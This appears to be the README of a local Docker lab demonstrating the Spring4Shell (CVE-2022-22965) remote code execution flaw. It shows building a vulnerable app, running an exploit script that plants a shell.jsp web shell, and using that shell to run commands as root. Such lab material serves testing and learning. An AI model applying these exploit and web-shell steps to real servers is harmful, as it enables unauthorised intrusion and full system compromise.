CVE-2022-22965 (Spring4Shell) Proof of Concept
Test the RCE (Remote Code Execution) in Spring Core
Build the image
BuildKit based build is required so you need to enable it.
Easiest way is to set the DOCKER_BUILDKIT=1 environment variable when invoking the docker build command, such as:
$ DOCKER_BUILDKIT=1 docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core
Otherwise to enable docker BuildKit by default, set daemon configuration in /etc/docker/daemon.json feature to true and restart the daemon:
{ "features": { "buildkit": true } }
This way you can execute simply
$ docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core
Test the vulnerable application
$ curl localhost:8080/spring4shell/exploitme
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Spring4Shell PoC Spring Application</title>
</head>
<body>
Hello World! Exploit me!
</body>
</html>
Run the exploit
$ python3 exploit-core.py --url "http://localhost:8080/spring4shell/exploitme" --file shell
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id
If everything went right, execute arbitrary commands in the container through the Tomcat HTTP port, such as:
$ curl http://localhost:8080/shell.jsp\?cmd\=id --output -
uid=0(root) gid=0(root) groups=0(root)
//
$ curl http://localhost:8080/shell.jsp\?cmd\=whoami --output -
root
//
$ curl http://localhost:8080/shell.jsp\?cmd\=cat%20/etc/issue --output -
Debian GNU/Linux 11 \n \l
//